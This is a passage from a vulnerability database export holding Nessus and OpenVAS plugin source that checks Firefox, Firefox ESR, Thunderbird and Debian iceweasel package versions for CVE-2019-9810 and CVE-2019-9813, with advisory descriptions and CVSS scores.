ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-son\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-sq\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = 
isdpkgvuln(pkg:\"iceweasel-l10n-sr\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-sv-se\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-ta\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-te\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-th\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-tr\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-uk\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-ur\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-uz\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-vi\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-xh\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-zh-cn\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-zh-tw\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if(__pkg_match) {\n exit(99);\n}\n\nexit(0);\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "nessus": [{"lastseen": "2020-05-31T20:40:12", "description": "This update upgrades Firefox to version 60.6.1 ESR.\n\nSecurity Fix(es) :\n\n - Mozilla: IonMonkey MArraySlice has incorrect alias\n information (CVE-2019-9810)\n\n - Mozilla: 
Ionmonkey type confusion with __proto__\n mutations (CVE-2019-9813)", "edition": 8, "cvss3": {"score": 8.8, "vector": "AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2019-03-28T00:00:00", "title": "Scientific Linux Security Update : firefox on SL7.x x86_64 (20190327)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2019-9813", "CVE-2019-9810"], "modified": "2019-03-28T00:00:00", "cpe": ["p-cpe:/a:fermilab:scientific_linux:firefox", "p-cpe:/a:fermilab:scientific_linux:firefox-debuginfo", "x-cpe:/o:fermilab:scientific_linux"], "id": "SL_20190327_FIREFOX_ON_SL7_X.NASL", "href": "https://www.tenable.com/plugins/nessus/123436", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text is (C) Scientific Linux.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(123436);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/05/29\");\n\n script_cve_id(\"CVE-2019-9810\", \"CVE-2019-9813\");\n\n script_name(english:\"Scientific Linux Security Update : firefox on SL7.x x86_64 (20190327)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\n\"The remote Scientific Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"This update upgrades Firefox to version 60.6.1 ESR.\n\nSecurity Fix(es) :\n\n - Mozilla: IonMonkey MArraySlice has incorrect alias\n information (CVE-2019-9810)\n\n - Mozilla: Ionmonkey type confusion with __proto__\n mutations (CVE-2019-9813)\"\n );\n # https://listserv.fnal.gov/scripts/wa.exe?A2=ind1903&L=SCIENTIFIC-LINUX-ERRATA&P=14184\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?e807e094\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\"Update the affected firefox and / or firefox-debuginfo packages.\"\n );\n 
script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:firefox\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:firefox-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"x-cpe:/o:fermilab:scientific_linux\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/04/26\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/03/27\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/03/28\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2019-2020 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Scientific Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Scientific Linux \" >!< release) audit(AUDIT_HOST_NOT, \"running Scientific Linux\");\nos_ver = pregmatch(pattern: \"Scientific Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Scientific Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^7([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Scientific Linux 7.x\", \"Scientific Linux \" + os_ver);\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Scientific Linux\", cpu);\nif (\"x86_64\" >!< cpu) audit(AUDIT_ARCH_NOT, \"x86_64\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"firefox-60.6.1-1.el7_6\", allowmaj:TRUE)) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"firefox-debuginfo-60.6.1-1.el7_6\", allowmaj:TRUE)) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"firefox / firefox-debuginfo\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-01T03:51:10", "description": "The version 
of Firefox installed on the remote Windows host is prior\nto 66.0.1. It is, therefore, affected by multiple vulnerabilities as\nreferenced in the mfsa2019-09 advisory.\n\n - Incorrect alias information in IonMonkey JIT compiler\n for Array.prototype.slice method may lead to missing\n bounds check and a buffer overflow. (CVE-2019-9810)\n\n - Incorrect handling of __proto__ mutations may lead to\n type confusion in IonMonkey JIT code and can be\n leveraged for arbitrary memory read and write.\n (CVE-2019-9813)\n\nNote that Nessus has not tested for this issue but has instead relied\nonly on the application's self-reported version number.", "edition": 19, "cvss3": {"score": 8.8, "vector": "AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2019-03-22T00:00:00", "title": "Mozilla Firefox < 66.0.1", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2019-9813", "CVE-2019-9810"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/a:mozilla:firefox"], "id": "MOZILLA_FIREFOX_66_0_1.NASL", "href": "https://www.tenable.com/plugins/nessus/123012", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n# The descriptive text and package checks in this plugin were\n# extracted from Mozilla Foundation Security Advisory mfsa2019-09.\n# The text itself is copyright (C) Mozilla Foundation.\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(123012);\n script_version(\"1.4\");\n script_cvs_date(\"Date: 2020/01/31\");\n\n script_cve_id(\"CVE-2019-9810\", \"CVE-2019-9813\");\n script_xref(name:\"MFSA\", value:\"2019-09\");\n\n script_name(english:\"Mozilla Firefox < 66.0.1\");\n script_summary(english:\"Checks the version of Firefox.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A web browser installed on the remote Windows host is affected by\nmultiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Firefox installed on the remote Windows host is prior\nto 66.0.1. 
It is, therefore, affected by multiple vulnerabilities as\nreferenced in the mfsa2019-09 advisory.\n\n - Incorrect alias information in IonMonkey JIT compiler\n for Array.prototype.slice method may lead to missing\n bounds check and a buffer overflow. (CVE-2019-9810)\n\n - Incorrect handling of __proto__ mutations may lead to\n type confusion in IonMonkey JIT code and can be\n leveraged for arbitrary memory read and write.\n (CVE-2019-9813)\n\nNote that Nessus has not tested for this issue but has instead relied\nonly on the application's self-reported version number.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2019-09/\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Mozilla Firefox version 66.0.1 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-9813\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/03/22\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/03/22\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/03/22\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:mozilla:firefox\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2019-2020 and is 
owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"mozilla_org_installed.nasl\");\n script_require_keys(\"Mozilla/Firefox/Version\");\n\n exit(0);\n}\n\ninclude(\"mozilla_version.inc\");\n\nport = get_kb_item(\"SMB/transport\");\nif (!port) port = 445;\n\ninstalls = get_kb_list(\"SMB/Mozilla/Firefox/*\");\nif (isnull(installs)) audit(AUDIT_NOT_INST, \"Firefox\");\n\nmozilla_check_version(installs:installs, product:'firefox', esr:FALSE, fix:'66.0.1', severity:SECURITY_WARNING);\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-01T03:50:52", "description": "The version of Firefox ESR installed on the remote Windows host is\nprior to 60.6.1. It is, therefore, affected by multiple\nvulnerabilities as referenced in the mfsa2019-10 advisory.\n\n - Incorrect alias information in IonMonkey JIT compiler\n for Array.prototype.slice method may lead to missing\n bounds check and a buffer overflow. (CVE-2019-9810)\n\n - Incorrect handling of __proto__ mutations may lead to\n type confusion in IonMonkey JIT code and can be\n leveraged for arbitrary memory read and write.\n (CVE-2019-9813)\n\nNote that Nessus has not tested for this issue but has instead relied\nonly on the application's self-reported version number.", "edition": 19, "cvss3": {"score": 8.8, "vector": "AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2019-03-27T00:00:00", "title": "Mozilla Firefox ESR < 60.6.1", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2019-9813", "CVE-2019-9810"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/a:mozilla:firefox_esr"], "id": "MOZILLA_FIREFOX_60_6_1_ESR.NASL", "href": "https://www.tenable.com/plugins/nessus/123134", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n# The descriptive text and package checks in this plugin were\n# extracted from Mozilla Foundation Security Advisory mfsa2019-10.\n# The text itself is copyright (C) Mozilla 
Foundation.\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(123134);\n script_version(\"1.4\");\n script_cvs_date(\"Date: 2020/01/31\");\n\n script_cve_id(\"CVE-2019-9810\", \"CVE-2019-9813\");\n script_xref(name:\"MFSA\", value:\"2019-10\");\n\n script_name(english:\"Mozilla Firefox ESR < 60.6.1\");\n script_summary(english:\"Checks the version of Firefox ESR.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A web browser installed on the remote Windows host is affected by\nmultiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Firefox ESR installed on the remote Windows host is\nprior to 60.6.1. It is, therefore, affected by multiple\nvulnerabilities as referenced in the mfsa2019-10 advisory.\n\n - Incorrect alias information in IonMonkey JIT compiler\n for Array.prototype.slice method may lead to missing\n bounds check and a buffer overflow. (CVE-2019-9810)\n\n - Incorrect handling of __proto__ mutations may lead to\n type confusion in IonMonkey JIT code and can be\n leveraged for arbitrary memory read and write.\n (CVE-2019-9813)\n\nNote that Nessus has not tested for this issue but has instead relied\nonly on the application's self-reported version number.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2019-10/\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Mozilla Firefox ESR version 60.6.1 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-9813\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n 
script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/03/22\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/03/22\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/03/27\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:mozilla:firefox_esr\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2019-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"mozilla_org_installed.nasl\");\n script_require_keys(\"Mozilla/Firefox/Version\");\n\n exit(0);\n}\n\ninclude(\"mozilla_version.inc\");\n\nport = get_kb_item(\"SMB/transport\");\nif (!port) port = 445;\n\ninstalls = get_kb_list(\"SMB/Mozilla/Firefox/*\");\nif (isnull(installs)) audit(AUDIT_NOT_INST, \"Firefox\");\n\nmozilla_check_version(installs:installs, product:'firefox', esr:TRUE, fix:'60.6.1', min:'60.0.0', severity:SECURITY_WARNING);\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-01T03:53:11", "description": "The version of Thunderbird installed on the remote Windows host is\nprior to 60.6.1. It is, therefore, affected by multiple\nvulnerabilities as referenced in the mfsa2019-12 advisory.\n\n - Incorrect alias information in IonMonkey JIT compiler\n for Array.prototype.slice method may lead to missing\n bounds check and a buffer overflow. 
(CVE-2019-9810)\n\n - Incorrect handling of __proto__ mutations may lead to\n type confusion in IonMonkey JIT code and can be\n leveraged for arbitrary memory read and write.\n (CVE-2019-9813)\n\nNote that Nessus has not tested for this issue but has instead relied\nonly on the application's self-reported version number.", "edition": 19, "cvss3": {"score": 8.8, "vector": "AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2019-03-29T00:00:00", "title": "Mozilla Thunderbird < 60.6.1", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2019-9813", "CVE-2019-9810"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/a:mozilla:thunderbird"], "id": "MOZILLA_THUNDERBIRD_60_6_1.NASL", "href": "https://www.tenable.com/plugins/nessus/123509", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n# The descriptive text and package checks in this plugin were\n# extracted from Mozilla Foundation Security Advisory mfsa2019-12.\n# The text itself is copyright (C) Mozilla Foundation.\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(123509);\n script_version(\"1.4\");\n script_cvs_date(\"Date: 2020/01/24\");\n\n script_cve_id(\"CVE-2019-9810\", \"CVE-2019-9813\");\n script_xref(name:\"MFSA\", value:\"2019-12\");\n\n script_name(english:\"Mozilla Thunderbird < 60.6.1\");\n script_summary(english:\"Checks the version of Thunderbird.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A mail client installed on the remote Windows host is affected by\nmultiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Thunderbird installed on the remote Windows host is\nprior to 60.6.1. It is, therefore, affected by multiple\nvulnerabilities as referenced in the mfsa2019-12 advisory.\n\n - Incorrect alias information in IonMonkey JIT compiler\n for Array.prototype.slice method may lead to missing\n bounds check and a buffer overflow. 
(CVE-2019-9810)\n\n - Incorrect handling of __proto__ mutations may lead to\n type confusion in IonMonkey JIT code and can be\n leveraged for arbitrary memory read and write.\n (CVE-2019-9813)\n\nNote that Nessus has not tested for this issue but has instead relied\nonly on the application's self-reported version number.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2019-12/\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Mozilla Thunderbird version 60.6.1 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-9813\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/03/25\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/03/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/03/29\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:mozilla:thunderbird\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2019-2020 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"mozilla_org_installed.nasl\");\n script_require_keys(\"Mozilla/Thunderbird/Version\");\n\n exit(0);\n}\n\ninclude(\"mozilla_version.inc\");\n\nport = get_kb_item(\"SMB/transport\");\nif (!port) port = 445;\n\ninstalls = get_kb_list(\"SMB/Mozilla/Thunderbird/*\");\nif (isnull(installs)) audit(AUDIT_NOT_INST, \"Thunderbird\");\n\nmozilla_check_version(installs:installs, product:'thunderbird', esr:FALSE, fix:'60.6.1', severity:SECURITY_WARNING);\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-01T03:21:40", "description": "The version of Firefox ESR installed on the remote macOS or Mac OS X\nhost is prior to 60.6.1. It is, therefore, affected by multiple\nvulnerabilities as referenced in the mfsa2019-10 advisory.\n\n - Incorrect alias information in IonMonkey JIT compiler\n for Array.prototype.slice method may lead to missing\n bounds check and a buffer overflow. (CVE-2019-9810)\n\n - Incorrect handling of __proto__ mutations may lead to\n type confusion in IonMonkey JIT code and can be\n leveraged for arbitrary memory read and write.\n (CVE-2019-9813)\n\nNote that Nessus has not tested for this issue but has instead relied\nonly on the application's self-reported version number.", "edition": 19, "cvss3": {"score": 8.8, "vector": "AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2019-03-27T00:00:00", "title": "Mozilla Firefox ESR < 60.6.1", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2019-9813", "CVE-2019-9810"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/a:mozilla:firefox_esr"], "id": "MACOS_FIREFOX_60_6_1_ESR.NASL", "href": "https://www.tenable.com/plugins/nessus/123133", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n# The descriptive text and package checks in this plugin were\n# extracted from Mozilla Foundation Security Advisory mfsa2019-10.\n# The text itself is copyright (C) Mozilla 
Foundation.\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(123133);\n script_version(\"1.4\");\n script_cvs_date(\"Date: 2020/01/31\");\n\n script_cve_id(\"CVE-2019-9810\", \"CVE-2019-9813\");\n script_xref(name:\"MFSA\", value:\"2019-10\");\n\n script_name(english:\"Mozilla Firefox ESR < 60.6.1\");\n script_summary(english:\"Checks the version of Firefox ESR.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A web browser installed on the remote macOS or Mac OS X host is\naffected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Firefox ESR installed on the remote macOS or Mac OS X\nhost is prior to 60.6.1. It is, therefore, affected by multiple\nvulnerabilities as referenced in the mfsa2019-10 advisory.\n\n - Incorrect alias information in IonMonkey JIT compiler\n for Array.prototype.slice method may lead to missing\n bounds check and a buffer overflow. (CVE-2019-9810)\n\n - Incorrect handling of __proto__ mutations may lead to\n type confusion in IonMonkey JIT code and can be\n leveraged for arbitrary memory read and write.\n (CVE-2019-9813)\n\nNote that Nessus has not tested for this issue but has instead relied\nonly on the application's self-reported version number.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2019-10/\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Mozilla Firefox ESR version 60.6.1 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-9813\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n 
script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/03/22\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/03/22\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/03/27\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:mozilla:firefox_esr\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"MacOS X Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2019-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"macosx_firefox_installed.nasl\");\n script_require_keys(\"MacOSX/Firefox/Version\");\n\n exit(0);\n}\n\ninclude(\"mozilla_version.inc\");\n\nkb_base = \"MacOSX/Firefox\";\nget_kb_item_or_exit(kb_base+\"/Installed\");\n\nversion = get_kb_item_or_exit(kb_base+\"/Version\", exit_code:1);\npath = get_kb_item_or_exit(kb_base+\"/Path\", exit_code:1);\n\nis_esr = get_kb_item(kb_base+\"/is_esr\");\nif (isnull(is_esr)) audit(AUDIT_NOT_INST, \"Mozilla Firefox ESR\");\n\nmozilla_check_version(version:version, path:path, product:'firefox', esr:TRUE, fix:'60.6.1', min:'60.0.0', severity:SECURITY_WARNING);\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-05-31T20:21:05", "description": "An update for firefox is now available for Red Hat Enterprise Linux 6.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Critical. 
A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nMozilla Firefox is an open source web browser, designed for standards\ncompliance, performance, and portability.\n\nThis update upgrades Firefox to version 60.6.1 ESR.\n\nSecurity Fix(es) :\n\n* Mozilla: IonMonkey MArraySlice has incorrect alias information\n(CVE-2019-9810)\n\n* Mozilla: Ionmonkey type confusion with __proto__ mutations\n(CVE-2019-9813)\n\nFor more details about the security issue(s), including the impact, a\nCVSS score, acknowledgments, and other related information, refer to\nthe CVE page(s) listed in the References section.", "edition": 10, "cvss3": {"score": 8.8, "vector": "AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2019-03-28T00:00:00", "title": "RHEL 6 : firefox (RHSA-2019:0672)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2019-9813", "CVE-2019-9810"], "modified": "2019-03-28T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:firefox", "p-cpe:/a:redhat:enterprise_linux:firefox-debuginfo", "cpe:/o:redhat:enterprise_linux:6"], "id": "REDHAT-RHSA-2019-0672.NASL", "href": "https://www.tenable.com/plugins/nessus/123434", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2019:0672. 
The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(123434);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/05/29\");\n\n script_cve_id(\"CVE-2019-9810\", \"CVE-2019-9813\");\n script_xref(name:\"RHSA\", value:\"2019:0672\");\n\n script_name(english:\"RHEL 6 : firefox (RHSA-2019:0672)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"An update for firefox is now available for Red Hat Enterprise Linux 6.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Critical. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nMozilla Firefox is an open source web browser, designed for standards\ncompliance, performance, and portability.\n\nThis update upgrades Firefox to version 60.6.1 ESR.\n\nSecurity Fix(es) :\n\n* Mozilla: IonMonkey MArraySlice has incorrect alias 